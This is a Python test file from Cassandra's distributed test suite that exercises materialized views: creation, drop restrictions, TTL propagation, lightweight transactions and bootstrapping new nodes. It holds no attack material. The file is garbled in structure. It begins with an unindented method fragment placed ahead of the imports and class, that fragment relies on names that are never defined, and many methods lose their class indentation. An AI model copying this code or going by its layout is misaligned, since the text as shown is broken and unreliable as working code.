def single_partition_consistent_reads_after_write_test(self):
"""
Tests consistency of multiple writes to a single partition
@jira_ticket CASSANDRA-10981
"""
self._consistent_reads_after_write_test(1)
def multi_partition_consistent_reads_after_write_test(self):
"""
Tests consistency of multiple writes to a multiple partitions
@jira_ticket CASSANDRA-10981
"""
self._consistent_reads_after_write_test(20)
def _consistent_reads_after_write_test(self, num_partitions):
session = self.prepare()
[node1, node2, node3] = self.cluster.nodelist()
# Test config
lower = 0
upper = 100000
processes = 4
queues = [None] * processes
eachProcess = (upper - lower) / processes
debug("Creating schema")
session.execute(
("CREATE KEYSPACE IF NOT EXISTS mvtest WITH replication = "
"{'class': 'SimpleStrategy', 'replication_factor': '3'}")
)
session.execute(
"CREATE TABLE mvtest.test1 (a int, b int, c int, d int, PRIMARY KEY (a,b))"
)
session.cluster.control_connection.wait_for_schema_agreement()
insert1 = session.prepare("INSERT INTO mvtest.test1 (a,b,c,d) VALUES (?,?,?,?)")
insert1.consistency_level = writeConsistency
debug("Writing data to base table")
for i in range(upper / 10):
self._do_row(insert1, i, num_partitions)
debug("Creating materialized view")
session.execute(
('CREATE MATERIALIZED VIEW mvtest.mv1 AS '
'SELECT a,b,c,d FROM mvtest.test1 WHERE a IS NOT NULL AND b IS NOT NULL AND '
'c IS NOT NULL PRIMARY KEY (c,a,b)')
)
session.cluster.control_connection.wait_for_schema_agreement()
debug("Writing more data to base table")
for i in range(upper / 10, upper):
self._do_row(insert1, i, num_partitions)
# Wait that all requests are done
while self.num_request_done < upper:
time.sleep(1)
debug("Making sure all batchlogs are replayed on node1")
node1.nodetool("replaybatchlog")
debug("Making sure all batchlogs are replayed on node2")
node2.nodetool("replaybatchlog")
debug("Making sure all batchlogs are replayed on node3")
node3.nodetool("replaybatchlog")
debug("Finished writes, now verifying reads")
self._populate_rows()
for i in range(processes):
start = lower + (eachProcess * i)
if i == processes - 1:
end = upper
else:
end = lower + (eachProcess * (i + 1))
q = Queue()
node_ip = self.get_ip_from_node(node2)
p = Process(target=thread_session, args=(node_ip, q, start, end, self.rows, num_partitions))
p.start()
queues[i] = q
for i in range(lower, upper):
if i % 100 == 0:
self._print_read_status(i)
mm = queues[i % processes].get()
if not mm.out() is None:
sys.stdout.write("\r{}\n" .format(mm.out()))
self.counts[mm.mp] += 1
self._print_read_status(upper)
sys.stdout.write("\n")
sys.stdout.flush()
# known failure:
# materialized_views_test.TestMaterializedViews.view_tombstone_test
import collections
import re
import sys
import time
import traceback
from functools import partial
from multiprocessing import Process, Queue
from unittest import skipIf
# TODO add in requirements.txt
from enum import Enum # Remove when switching to py3
from assertions import (assert_all, assert_crc_check_chance_equal,
assert_invalid, assert_none, assert_one,
assert_unavailable)
from cassandra import ConsistencyLevel
from cassandra.cluster import Cluster
from cassandra.query import SimpleStatement
from dtest import Tester, debug
from tools import known_failure, new_node, since
# CASSANDRA-10978. Migration wait (in seconds) to use in bootstrapping tests. Needed to handle
# pathological case of flushing schema keyspace for multiple data directories. See CASSANDRA-6696
# for multiple data directory changes and CASSANDRA-10421 for compaction logging that must be
# written.
MIGRATION_WAIT = 5
@since('3.0')
class TestMaterializedViews(Tester):
"""
Test materialized views implementation.
@jira_ticket CASSANDRA-6477
@since 3.0
"""
    def prepare(self, user_table=False, rf=1, options=None, nodes=3):
        """Start a cluster and return a session on node1 with keyspace 'ks'.

        @param user_table: also create the `users` table and its
            `users_by_state` materialized view
        @param rf: replication factor for the 'ks' keyspace
        @param options: optional cassandra.yaml overrides for all nodes
        @param nodes: number of nodes in the first datacenter
        """
        cluster = self.cluster
        # Second datacenter is left empty (0 nodes) for bootstrap tests.
        cluster.populate([nodes, 0])
        if options:
            cluster.set_configuration_options(values=options)
        cluster.start()
        node1 = cluster.nodelist()[0]
        session = self.patient_cql_connection(node1)
        self.create_ks(session, 'ks', rf)
        if user_table:
            session.execute(
                ("CREATE TABLE users (username varchar, password varchar, gender varchar, "
                 "session_token varchar, state varchar, birth_year bigint, "
                 "PRIMARY KEY (username));")
            )
            # create a materialized view
            session.execute(("CREATE MATERIALIZED VIEW users_by_state AS "
                             "SELECT * FROM users WHERE STATE IS NOT NULL AND username IS NOT NULL "
                             "PRIMARY KEY (state, username)"))
        return session
def _insert_data(self, session):
# insert data
insert_stmt = "INSERT INTO users (username, password, gender, state, birth_year) VALUES "
session.execute(insert_stmt + "('user1', 'ch@ngem3a', 'f', 'TX', 1968);")
session.execute(insert_stmt + "('user2', 'ch@ngem3b', 'm', 'CA', 1971);")
session.execute(insert_stmt + "('user3', 'ch@ngem3c', 'f', 'FL', 1978);")
session.execute(insert_stmt + "('user4', 'ch@ngem3d', 'm', 'TX', 1974);")
def _replay_batchlogs(self):
debug("Replaying batchlog on all nodes")
for node in self.cluster.nodelist():
if node.is_running():
node.nodetool("replaybatchlog")
def create_test(self):
"""Test the materialized view creation"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
self.assertEqual(len(result), 1, "Expecting 1 materialized view, got" + str(result))
    def test_gcgs_validation(self):
        """Verify that it's not possible to create or set a too low gc_grace_seconds on MVs"""
        session = self.prepare(user_table=True)
        # Shouldn't be able to alter the gc_grace_seconds of the base table to 0
        assert_invalid(session,
                       "ALTER TABLE users WITH gc_grace_seconds = 0",
                       "Cannot alter gc_grace_seconds of the base table of a materialized view "
                       "to 0, since this value is used to TTL undelivered updates. Setting "
                       "gc_grace_seconds too low might cause undelivered updates to expire "
                       "before being replayed.")
        # But can alter the gc_grace_seconds of the base table to a value != 0
        session.execute("ALTER TABLE users WITH gc_grace_seconds = 10")
        # Shouldn't be able to alter the gc_grace_seconds of the MV to 0
        assert_invalid(session,
                       "ALTER MATERIALIZED VIEW users_by_state WITH gc_grace_seconds = 0",
                       "Cannot alter gc_grace_seconds of a materialized view to 0, since "
                       "this value is used to TTL undelivered updates. Setting gc_grace_seconds "
                       "too low might cause undelivered updates to expire before being replayed.")
        # Now let's drop MV
        session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
        # Now we should be able to set the gc_grace_seconds of the base table to 0
        session.execute("ALTER TABLE users WITH gc_grace_seconds = 0")
        # Now we shouldn't be able to create a new MV on this table
        assert_invalid(session,
                       "CREATE MATERIALIZED VIEW users_by_state AS "
                       "SELECT * FROM users WHERE STATE IS NOT NULL AND username IS NOT NULL "
                       "PRIMARY KEY (state, username)",
                       "Cannot create materialized view 'users_by_state' for base table 'users' "
                       "with gc_grace_seconds of 0, since this value is used to TTL undelivered "
                       "updates. Setting gc_grace_seconds too low might cause undelivered updates"
                       " to expire before being replayed.")
    def insert_test(self):
        """Test that basic insertions into the base table are reflected in the view."""
        session = self.prepare(user_table=True)
        self._insert_data(session)
        result = list(session.execute("SELECT * FROM users;"))
        self.assertEqual(len(result), 4, "Expecting {} users, got {}".format(4, len(result)))
        # Two of the four sample users live in TX, one in CA, none in MA.
        result = list(session.execute("SELECT * FROM users_by_state WHERE state='TX';"))
        self.assertEqual(len(result), 2, "Expecting {} users, got {}".format(2, len(result)))
        result = list(session.execute("SELECT * FROM users_by_state WHERE state='CA';"))
        self.assertEqual(len(result), 1, "Expecting {} users, got {}".format(1, len(result)))
        result = list(session.execute("SELECT * FROM users_by_state WHERE state='MA';"))
        self.assertEqual(len(result), 0, "Expecting {} users, got {}".format(0, len(result)))
    def populate_mv_after_insert_test(self):
        """Test that a view is OK when created with existing data (view build path)."""
        session = self.prepare()
        session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
        for i in xrange(1000):
            session.execute("INSERT INTO t (id, v) VALUES ({v}, {v})".format(v=i))
        # View is created after the data, so the rows must arrive via the
        # view build rather than the write path.
        session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
                         "AND id IS NOT NULL PRIMARY KEY (v, id)"))
        debug("wait that all batchlogs are replayed")
        self._replay_batchlogs()
        for i in xrange(1000):
            assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(i), [i, i])
    def crc_check_chance_test(self):
        """Test that crc_check_chance parameter is properly populated after mv creation and update"""
        session = self.prepare()
        session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
        # Set crc_check_chance at view-creation time...
        session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
                         "AND id IS NOT NULL PRIMARY KEY (v, id) WITH crc_check_chance = 0.5"))
        assert_crc_check_chance_equal(session, "t_by_v", 0.5, view=True)
        # ...and via ALTER MATERIALIZED VIEW afterwards.
        session.execute("ALTER MATERIALIZED VIEW t_by_v WITH crc_check_chance = 0.3")
        assert_crc_check_chance_equal(session, "t_by_v", 0.3, view=True)
    def prepared_statement_test(self):
        """Test basic insertions with prepared statement (both write and view read)."""
        session = self.prepare(user_table=True)
        insertPrepared = session.prepare(
            "INSERT INTO users (username, password, gender, state, birth_year) VALUES (?, ?, ?, ?, ?);"
        )
        selectPrepared = session.prepare(
            "SELECT state, password, session_token FROM users_by_state WHERE state=?;"
        )
        # insert data
        session.execute(insertPrepared.bind(('user1', 'ch@ngem3a', 'f', 'TX', 1968)))
        session.execute(insertPrepared.bind(('user2', 'ch@ngem3b', 'm', 'CA', 1971)))
        session.execute(insertPrepared.bind(('user3', 'ch@ngem3c', 'f', 'FL', 1978)))
        session.execute(insertPrepared.bind(('user4', 'ch@ngem3d', 'm', 'TX', 1974)))
        result = list(session.execute("SELECT * FROM users;"))
        self.assertEqual(len(result), 4, "Expecting {} users, got {}".format(4, len(result)))
        # Two users in TX, one in CA, none in MA (mirrors insert_test).
        result = list(session.execute(selectPrepared.bind(['TX'])))
        self.assertEqual(len(result), 2, "Expecting {} users, got {}".format(2, len(result)))
        result = list(session.execute(selectPrepared.bind(['CA'])))
        self.assertEqual(len(result), 1, "Expecting {} users, got {}".format(1, len(result)))
        result = list(session.execute(selectPrepared.bind(['MA'])))
        self.assertEqual(len(result), 0, "Expecting {} users, got {}".format(0, len(result)))
    def immutable_test(self):
        """Test that a materialized view rejects every kind of direct modification."""
        session = self.prepare(user_table=True)
        # cannot insert
        assert_invalid(session, "INSERT INTO users_by_state (state, username) VALUES ('TX', 'user1');",
                       "Cannot directly modify a materialized view")
        # cannot update
        assert_invalid(session, "UPDATE users_by_state SET session_token='XYZ' WHERE username='user1' AND state = 'TX';",
                       "Cannot directly modify a materialized view")
        # cannot delete a row
        assert_invalid(session, "DELETE from users_by_state where state='TX';",
                       "Cannot directly modify a materialized view")
        # cannot delete a cell
        assert_invalid(session, "DELETE session_token from users_by_state where state='TX';",
                       "Cannot directly modify a materialized view")
        # cannot alter a table
        assert_invalid(session, "ALTER TABLE users_by_state ADD first_name varchar",
                       "Cannot use ALTER TABLE on Materialized View")
    def drop_mv_test(self):
        """Test that we can drop a view properly and system_schema.views reflects it."""
        session = self.prepare(user_table=True)
        # create another materialized view
        session.execute(("CREATE MATERIALIZED VIEW users_by_birth_year AS "
                         "SELECT * FROM users WHERE birth_year IS NOT NULL AND "
                         "username IS NOT NULL PRIMARY KEY (birth_year, username)"))
        result = list(session.execute(("SELECT * FROM system_schema.views "
                                       "WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
        self.assertEqual(len(result), 2, "Expecting {} materialized view, got {}".format(2, len(result)))
        # Dropping one view should leave exactly one behind.
        session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
        result = list(session.execute(("SELECT * FROM system_schema.views "
                                       "WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
        self.assertEqual(len(result), 1, "Expecting {} materialized view, got {}".format(1, len(result)))
def drop_column_test(self):
    """Test that we cannot drop a column if it is used by a MV.

    The 'state' column is part of the users_by_state view's primary key,
    so ALTER TABLE ... DROP must be rejected while the view exists.
    """
    session = self.prepare(user_table=True)

    # Sanity check: the view created by prepare() is registered.
    result = list(session.execute(("SELECT * FROM system_schema.views "
                                   "WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
    self.assertEqual(len(result), 1, "Expecting {} materialized view, got {}".format(1, len(result)))

    # Dropping a column the view depends on must fail.
    assert_invalid(
        session,
        "ALTER TABLE ks.users DROP state;",
        "Cannot drop column state, depended on by materialized views"
    )
def drop_table_test(self):
    """Test that we cannot drop a table without deleting its MVs first.

    DROP TABLE must be refused while a materialized view depends on the
    base table; after dropping the view, dropping the table succeeds and
    its entries disappear from system_schema.views.
    """
    session = self.prepare(user_table=True)

    # The prepared users table comes with exactly one dependent view.
    result = list(session.execute(("SELECT * FROM system_schema.views "
                                   "WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
    self.assertEqual(
        len(result), 1,
        "Expecting {} materialized view, got {}".format(1, len(result))
    )

    # Dropping the base table while the view exists must be rejected.
    assert_invalid(
        session,
        "DROP TABLE ks.users;",
        "Cannot drop table when materialized views still depend on it"
    )

    # The failed DROP must not have removed the view.
    result = list(session.execute(("SELECT * FROM system_schema.views "
                                   "WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
    self.assertEqual(
        len(result), 1,
        "Expecting {} materialized view, got {}".format(1, len(result))
    )

    # Drop the view first, then the table; both should now succeed.
    session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
    session.execute("DROP TABLE ks.users;")

    result = list(session.execute(("SELECT * FROM system_schema.views "
                                   "WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
    self.assertEqual(
        len(result), 0,
        # Fix: the failure message previously claimed 1 expected view while
        # the assertion checks for 0.
        "Expecting {} materialized view, got {}".format(0, len(result))
    )
def clustering_column_test(self):
    """Test that we can use clustering columns as primary key for a materialized view."""
    session = self.prepare()

    # Base table with two clustering columns (state, birth_year).
    session.execute(("CREATE TABLE users (username varchar, password varchar, gender varchar, "
                     "session_token varchar, state varchar, birth_year bigint, "
                     "PRIMARY KEY (username, state, birth_year));"))

    # create a materialized view that use a compound key built from the
    # base table's clustering columns plus the original partition key
    session.execute(("CREATE MATERIALIZED VIEW users_by_state_birth_year "
                     "AS SELECT * FROM users WHERE state IS NOT NULL AND birth_year IS NOT NULL "
                     "AND username IS NOT NULL PRIMARY KEY (state, birth_year, username)"))

    self._insert_data(session)

    # Query by the view's partition key alone, then with a clustering restriction.
    result = list(session.execute("SELECT * FROM ks.users_by_state_birth_year WHERE state='TX'"))
    self.assertEqual(len(result), 2, "Expecting {} users, got {}".format(2, len(result)))

    result = list(session.execute("SELECT * FROM ks.users_by_state_birth_year WHERE state='TX' AND birth_year=1968"))
    self.assertEqual(len(result), 1, "Expecting {} users, got {}".format(1, len(result)))
def _add_dc_after_mv_test(self, rf):
    """
    @jira_ticket CASSANDRA-10978

    Add datacenter with configurable replication. Shared driver for the
    add_dc_after_mv_* tests: writes through a view, bootstraps two nodes
    in a second DC, then verifies reads from the new DC and continued
    view maintenance for subsequent writes.

    @param rf replication setting passed to prepare() (int for
        SimpleStrategy, dict for NetworkTopologyStrategy)
    """
    session = self.prepare(rf=rf)

    debug("Creating schema")
    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    debug("Writing 1k to base")
    for i in xrange(1000):
        # v is the negated id so base and view keys are disjoint ranges
        session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))

    debug("Reading 1k from view")
    for i in xrange(1000):
        assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])

    debug("Reading 1k from base")
    for i in xrange(1000):
        assert_one(session, "SELECT * FROM t WHERE id = {}".format(i), [i, -i])

    debug("Bootstrapping new node in another dc")
    node4 = new_node(self.cluster, data_center='dc2')
    node4.start(wait_other_notice=True, wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])

    debug("Bootstrapping new node in another dc")
    node5 = new_node(self.cluster, remote_debug_port='1414', data_center='dc2')
    node5.start(jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])

    # Read the view through a coordinator in the new datacenter.
    session2 = self.patient_exclusive_cql_connection(node4)

    debug("Verifying data from new node in view")
    for i in xrange(1000):
        assert_one(session2, "SELECT * FROM ks.t_by_v WHERE v = {}".format(-i), [-i, i])

    debug("Inserting 100 into base")
    for i in xrange(1000, 1100):
        session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))

    debug("Verify 100 in view")
    for i in xrange(1000, 1100):
        assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
def add_dc_after_mv_simple_replication_test(self):
    """
    @jira_ticket CASSANDRA-10634

    Test that materialized views work as expected when adding a datacenter with SimpleStrategy.
    """
    # rf=1 -> SimpleStrategy with replication_factor 1
    self._add_dc_after_mv_test(1)
def add_dc_after_mv_network_replication_test(self):
    """
    @jira_ticket CASSANDRA-10634

    Test that materialized views work as expected when adding a datacenter with NetworkTopologyStrategy.
    """
    # per-DC replication factors -> NetworkTopologyStrategy
    self._add_dc_after_mv_test({'dc1': 1, 'dc2': 1})
def add_node_after_mv_test(self):
    """
    @jira_ticket CASSANDRA-10978

    Test that materialized views work as expected when adding a node.
    Existing view data must be readable from the new node, and writes
    made after bootstrap must still be reflected in the view.
    """
    session = self.prepare()

    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    for i in xrange(1000):
        session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))

    for i in xrange(1000):
        assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])

    # Bootstrap a fourth node into the same DC.
    node4 = new_node(self.cluster)
    node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])

    # Verify the pre-bootstrap data through the new node.
    session2 = self.patient_exclusive_cql_connection(node4)

    for i in xrange(1000):
        assert_one(session2, "SELECT * FROM ks.t_by_v WHERE v = {}".format(-i), [-i, i])

    # Writes after bootstrap must also show up in the view.
    for i in xrange(1000, 1100):
        session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))

    for i in xrange(1000, 1100):
        assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
def add_write_survey_node_after_mv_test(self):
    """
    @jira_ticket CASSANDRA-10621
    @jira_ticket CASSANDRA-10978

    Test that materialized views work as expected when adding a node in write survey mode.
    A write-survey node receives writes but does not serve reads, so the view
    must remain consistent when read through the original nodes.
    """
    session = self.prepare()

    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    for i in xrange(1000):
        session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))

    for i in xrange(1000):
        assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])

    # Bootstrap a node in write-survey mode.
    node4 = new_node(self.cluster)
    node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.write_survey=true", "-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])

    # Write more rows while the survey node is up, then verify the full set.
    for i in xrange(1000, 1100):
        session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))

    for i in xrange(1100):
        assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
def allow_filtering_test(self):
    """Test that allow filtering works as usual for a materialized view.

    Queries restricted only by the view's partition key succeed; adding a
    restriction on a non-key column requires ALLOW FILTERING, exactly as
    for a normal table.
    """
    session = self.prepare()
    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
    session.execute(("CREATE MATERIALIZED VIEW t_by_v2 AS SELECT * FROM t "
                     "WHERE v2 IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v2, id)"))

    for i in xrange(1000):
        session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))

    for i in xrange(1000):
        assert_one(session, "SELECT * FROM t_by_v WHERE v = {v}".format(v=i), [i, i, 'a', 3.0])

    rows = list(session.execute("SELECT * FROM t_by_v2 WHERE v2 = 'a'"))
    self.assertEqual(len(rows), 1000, "Expected 1000 rows but got {}".format(len(rows)))

    # Restricting a non-primary-key column without ALLOW FILTERING is invalid.
    assert_invalid(session, "SELECT * FROM t_by_v WHERE v = 1 AND v2 = 'a'")
    assert_invalid(session, "SELECT * FROM t_by_v2 WHERE v2 = 'a' AND v = 1")

    # With ALLOW FILTERING the same restrictions are accepted.
    for i in xrange(1000):
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = {} AND v3 = 3.0 ALLOW FILTERING".format(i),
            [i, i, 'a', 3.0]
        )
        assert_one(
            session,
            "SELECT * FROM t_by_v2 WHERE v2 = 'a' AND v = {} ALLOW FILTERING".format(i),
            ['a', i, i, 3.0]
        )
def secondary_index_test(self):
    """Test that secondary indexes cannot be created on a materialized view."""
    session = self.prepare()
    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
    # CREATE INDEX targeting the view must be rejected by the server.
    assert_invalid(session, "CREATE INDEX ON t_by_v (v2)",
                   "Secondary indexes are not supported on materialized views")
def ttl_test(self):
    """
    Test that TTL works as expected for a materialized view
    @expected_result The TTL is propagated properly between tables.
    """
    session = self.prepare()
    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 int, v3 int)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v2 AS SELECT * FROM t "
                     "WHERE v2 IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v2, id)"))

    # Insert with a 10 second TTL; rows must be visible in the view first.
    for i in xrange(100):
        session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, {v}, {v}) USING TTL 10".format(v=i))

    for i in xrange(100):
        assert_one(session, "SELECT * FROM t_by_v2 WHERE v2 = {}".format(i), [i, i, i, i])

    # Sleep past the TTL (with margin); view rows must have expired too.
    time.sleep(20)

    rows = list(session.execute("SELECT * FROM t_by_v2"))
    self.assertEqual(len(rows), 0, "Expected 0 rows but got {}".format(len(rows)))
def query_all_new_column_test(self):
    """
    Test that a materialized view created with a 'SELECT *' works as expected when adding a new column
    @expected_result The new column is present in the view.
    """
    session = self.prepare(user_table=True)

    self._insert_data(session)

    # Baseline row before the schema change.
    assert_one(
        session,
        "SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
        ['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
    )

    session.execute("ALTER TABLE users ADD first_name varchar;")

    # The SELECT * view must pick up the new column (as NULL for existing rows).
    results = list(session.execute("SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'"))
    self.assertEqual(len(results), 1)
    self.assertTrue(hasattr(results[0], 'first_name'), 'Column "first_name" not found')
    assert_one(
        session,
        "SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
        ['TX', 'user1', 1968, None, 'f', 'ch@ngem3a', None]
    )
def query_new_column_test(self):
    """
    Test that a materialized view created with 'SELECT <col1, ...>' works as expected when adding a new column
    @expected_result The new column is not present in the view.
    """
    session = self.prepare(user_table=True)

    # View selecting only an explicit column list (not SELECT *).
    session.execute(("CREATE MATERIALIZED VIEW users_by_state2 AS SELECT username FROM users "
                     "WHERE STATE IS NOT NULL AND USERNAME IS NOT NULL PRIMARY KEY (state, username)"))

    self._insert_data(session)

    assert_one(
        session,
        "SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'",
        ['TX', 'user1']
    )

    session.execute("ALTER TABLE users ADD first_name varchar;")

    # The explicit-column view must NOT gain the new base-table column.
    results = list(session.execute("SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'"))
    self.assertEqual(len(results), 1)
    self.assertFalse(hasattr(results[0], 'first_name'), 'Column "first_name" found in view')
    assert_one(
        session,
        "SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'",
        ['TX', 'user1']
    )
def lwt_test(self):
    """Test that lightweight transaction behave properly with a materialized view.

    Exercises IF NOT EXISTS inserts, conditional updates and conditional
    deletes against the base table, replaying batchlogs after each phase,
    and verifies the view reflects only the LWT operations that applied.
    """
    session = self.prepare()
    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    debug("Inserting initial data using IF NOT EXISTS")
    for i in xrange(1000):
        session.execute(
            "INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i)
        )
    self._replay_batchlogs()

    debug("All rows should have been inserted")
    for i in xrange(1000):
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = {}".format(i),
            [i, i, 'a', 3.0]
        )

    # Fix: debug message was garbled ("Tyring to UpInsert").
    debug("Trying to upsert data with a different value using IF NOT EXISTS")
    for i in xrange(1000):
        v = i * 2
        session.execute(
            "INSERT INTO t (id, v, v2, v3) VALUES ({id}, {v}, 'a', 3.0) IF NOT EXISTS".format(id=i, v=v)
        )
    self._replay_batchlogs()

    debug("No rows should have changed")
    for i in xrange(1000):
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = {}".format(i),
            [i, i, 'a', 3.0]
        )

    debug("Update the 10 first rows with a different value")
    # Conditional update over all 1000 rows; only ids 0-9 satisfy IF v < 10.
    for i in xrange(1000):
        v = i + 2000
        session.execute(
            "UPDATE t SET v={v} WHERE id = {id} IF v < 10".format(id=i, v=v)
        )
    self._replay_batchlogs()

    debug("Verify that only the 10 first rows changed.")
    results = list(session.execute("SELECT * FROM t_by_v;"))
    self.assertEqual(len(results), 1000)
    for i in xrange(1000):
        v = i + 2000 if i < 10 else i
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = {}".format(v),
            [v, i, 'a', 3.0]
        )

    debug("Deleting the first 10 rows")
    # Conditional delete over all 1000 rows; only ids 0-9 (v == id+2000 after
    # the update above) satisfy the condition and are removed.
    for i in xrange(1000):
        v = i + 2000
        session.execute(
            "DELETE FROM t WHERE id = {id} IF v = {v} ".format(id=i, v=v)
        )
    self._replay_batchlogs()

    debug("Verify that only the 10 first rows have been deleted.")
    results = list(session.execute("SELECT * FROM t_by_v;"))
    self.assertEqual(len(results), 990)
    for i in xrange(10, 1000):
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = {}".format(i),
            [i, i, 'a', 3.0]
        )
def interrupt_build_process_test(self):
    """Test that an interrupted MV build process is resumed as it should.

    Stops the whole cluster while the initial view build is running, then
    restarts it and waits (up to ~2 minutes) for the build to finish.
    """
    session = self.prepare(options={'hinted_handoff_enabled': False})
    node1, node2, node3 = self.cluster.nodelist()

    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")

    debug("Inserting initial data")
    for i in xrange(10000):
        session.execute(
            "INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i)
        )

    debug("Create a MV")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    debug("Stop the cluster. Interrupt the MV build process.")
    self.cluster.stop()

    debug("Restart the cluster")
    self.cluster.start(wait_for_binary_proto=True)
    session = self.patient_cql_connection(node1)
    session.execute("USE ks")

    debug("MV shouldn't be built yet.")
    assert_none(session, "SELECT * FROM t_by_v WHERE v=10000;")

    debug("Wait and ensure the MV build resumed. Waiting up to 2 minutes.")
    start = time.time()
    while True:
        try:
            # While the build is incomplete the count differs from 10000;
            # the AssertionError below is raised once the build finishes.
            result = list(session.execute("SELECT count(*) FROM t_by_v;"))
            self.assertNotEqual(result[0].count, 10000)
        except AssertionError:
            debug("MV build process is finished")
            break

        # Safety valve: give up after ~2 minutes.
        elapsed = (time.time() - start) / 60
        if elapsed > 2:
            break

        time.sleep(5)

    debug("Verify all data")
    result = list(session.execute("SELECT count(*) FROM t_by_v;"))
    self.assertEqual(result[0].count, 10000)
    for i in xrange(10000):
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = {}".format(i),
            [i, i, 'a', 3.0],
            cl=ConsistencyLevel.ALL
        )
@known_failure(failure_source='test',
               jira_url='https://issues.apache.org/jira/browse/CASSANDRA-11265',
               flaky=True)
def view_tombstone_test(self):
    """
    Test that a materialized views properly tombstone
    @jira_ticket CASSANDRA-10261
    @jira_ticket CASSANDRA-10910

    Uses explicit write timestamps to create and then shadow view rows,
    and checks via query tracing that read repair resolves the resulting
    digest mismatch exactly once.
    """
    self.prepare(rf=3, options={'hinted_handoff_enabled': False})
    node1, node2, node3 = self.cluster.nodelist()
    session = self.patient_exclusive_cql_connection(node1)
    session.max_trace_wait = 120
    session.execute('USE ks')

